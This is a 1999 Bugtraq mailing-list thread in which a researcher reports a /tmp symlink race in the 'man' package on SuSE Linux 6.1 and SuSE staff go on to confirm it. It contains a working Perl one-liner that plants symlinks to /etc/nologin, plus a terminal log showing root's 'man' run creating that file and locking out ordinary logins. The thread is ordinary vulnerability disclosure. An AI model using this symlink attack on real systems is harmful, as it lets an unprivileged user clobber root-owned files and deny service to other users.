Date: Wed, 2 Jun 1999 11:01:32 +0200
From: Thomas Fischbacher <Thomas.Fischbacher@PHYSIK.UNI-MUENCHEN.DE>
To: BUGTRAQ@netspace.org
Subject: /tmp symlink problems in SuSE Linux 6.1

I notified SuSE GmbH several weeks ago about this problem, but didn't get
any response, therefore this post to Bugtraq.


With SuSE Linux 6.1 there are still a few programs around which blindly
create files in /tmp regardless of whether a symlink or something
similarly evil already exists in that place. Among these programs are
'man'and 'dvips'.


Though it seems to be impossible by now to overwrite /etc/passwd with a
plain simple /tmp/zman01234aaa symlink (didn't check if the source is
race-condition free, though), one can still create arbitrary
files which do funny things. Example:

perl -e 'for($i=1000;$i<5000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}'


--
regards,               tf@cip.physik.uni-muenchen.de              (o_
 Thomas Fischbacher -  http://www.cip.physik.uni-muenchen.de/~tf  //\
(lambda (n) ((lambda (p q r) (p p q r)) (lambda (g x y)           V_/_
(if (= x 0) y (g g (- x 1) (* x y)))) n 1))

-------------------------------------------------------------------------------

Date: Fri, 4 Jun 1999 09:52:36 +0200
From: Thomas Biege <thomas@SUSE.DE>
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1

Hi,
we at SuSE could not reproduce this problem neither for
man nor for dvips.

Please send us a full list of "maybe" buggy tools, so we
could evaluate them.

Bye,
     Thomas

PS: I never saw your email at your mailinglists.

--
  Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
  E@mail: thomas@suse.de      Function: Security Support & Auditing
  "lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka"
  Key fingerprint = E3 42 DA D1 3B 9C 23 D0  93 1F B8 2E 6B 9A 45 82

-------------------------------------------------------------------------------

Date: Fri, 4 Jun 1999 16:36:46 +0200
From: Thomas Fischbacher <Thomas.Fischbacher@PHYSIK.UNI-MUENCHEN.DE>
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1

> Hi,
> we at SuSE could not reproduce this problem neither for
> man nor for dvips.

Ok, here is a log of what I just did five minutes ago:
(emacs -- M-x shell, btw.)


brauneck:~ # whoami
root
brauneck:~ # cd /tmp
brauneck:/tmp # cat /etc/SuSE-release
SuSE Linux 6.1 (i386)
VERSION = 6.1
brauneck:/tmp # rpm -q man
man-2.3.10-62
brauneck:/tmp # md5sum /usr/bin/man
b383967ce695352002f077680e375c62  /usr/bin/man
brauneck:/tmp # su tf
tf@brauneck:/tmp > export LS_OPTIONS=''
tf@brauneck:/tmp > export LS_COLORS=''
tf@brauneck:/tmp > ls zman*
ls: zman*: No such file or directory
tf@brauneck:/tmp > /bin/bash -c "echo $$"
6056
tf@brauneck:/tmp > # this gives me a current pid range
tf@brauneck:/tmp > perl -e 'for($i=6000;$i<7000;$i++){symlink "/etc/nologin", "/tmp/zman0${i}aaa";}'
tf@brauneck:/tmp > ls -l /tmp/zman06123aaa
lrwxrwxrwx   1 tf       stud           12 Jun  4 16:28 /tmp/zman06123aaa -> /etc/nologin
tf@brauneck:/tmp > ls -l /etc/nologin
ls: /etc/nologin: No such file or directory
tf@brauneck:/tmp > exit
brauneck:/tmp # man mmap
Reformatting mmap(2), please wait...
WARNING: terminal is not fully functional




MMAP(2)             Linux Programmer's Manual             MMAP(2)


NAME
       mmap, munmap - map or unmap files or devices into memory

SYNOPSIS
       #include <unistd.h>
       #include <sys/mman.h>

       #ifdef _POSIX_MAPPED_FILES

       void  *  mmap(void  *start,  size_t length, int prot , int
       flags, int fd, off_t offset);

       int munmap(void *start, size_t length);

       #endif

DESCRIPTION


brauneck:/tmp # ls -la /etc/nologin
-rw-r--r--   1 root     root         4319 Jun  4 16:30 /etc/nologin
brauneck:/tmp # ls /tmp/zman0* | wc -l
    999
brauneck:/tmp # # Note that one link was removed!
brauneck:/tmp #

You see -- the problem definitely is not fiction! Come over to Munich and
see yourself if you want.


> Please send us a full list of "maybe" buggy tools, so we
> could evaluate them.

?

> PS: I never saw your email at your mailinglists.

?

--
regards,               tf@cip.physik.uni-muenchen.de              (o_
 Thomas Fischbacher -  http://www.cip.physik.uni-muenchen.de/~tf  //\
(lambda (n) ((lambda (p q r) (p p q r)) (lambda (g x y)           V_/_
(if (= x 0) y (g g (- x 1) (* x y)))) n 1))

-------------------------------------------------------------------------------

Date: Sat, 5 Jun 1999 07:13:28 +0200
From: Thomas Biege <thomas@SUSE.DE>
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1

On Fri, 4 Jun 1999, Thomas Fischbacher wrote:

> > we at SuSE could not reproduce this problem neither for
> > man nor for dvips.
>
> Ok, here is a log of what I just did five minutes ago:
> (emacs -- M-x shell, btw.)

[...]

> You see -- the problem definitely is not fiction! Come over to Munich and
> see yourself if you want.

I don't think it's a fiction...
... the fact is, that just old releases of SuSE 6.1 seem to be
vulnerable, the newer releases didn't - man uses open(O_EXCL) and
drops it's privileges.

A customer told me, that the behavior you described just happens
when he opens a big man page for the first time... we will check
this as soon as posible.

> > Please send us a full list of "maybe" buggy tools, so we
> > could evaluate them.
> ?

In your first post to bugtraq you mentioned, that more tools have
/tmp symlink problems... feel free to tell us about them.
(BTW, I strace'd dvips on my SuSE 6.0 and it never touched /tmp.)

Bye,
     Thomas
--
  Thomas Biege, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
  E@mail: thomas@suse.de      Function: Security Support & Auditing
  "lynx -source http://www.suse.de/~thomas/thomas.pgp | pgp -fka"
  Key fingerprint = E3 42 DA D1 3B 9C 23 D0  93 1F B8 2E 6B 9A 45 82

-------------------------------------------------------------------------------

Date: Sat, 5 Jun 1999 22:02:19 +0200
From: Marc Heuse <marc@SUSE.DE>
To: BUGTRAQ@netspace.org
Subject: Re: /tmp symlink problems in SuSE Linux 6.1

Hi,

we confirmed the link vulnerablity in the man package.
The culprit is zsoelim which creates the file without looking left and
right. :-(

All linux distributions using man 2.3.10 should be affected.

A fixed package from us will be available soon.

Greets,
        Marc
--
   Marc Heuse, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
   E@mail: marc@suse.de  Function: Security Support & Auditing
   "lynx -source http://www.suse.de/~marc/marc.pgp | pgp -fka"
Key fingerprint = B5 07 B6 4E 9C EF 27 EE  16 D9 70 D4 87 B5 63 6C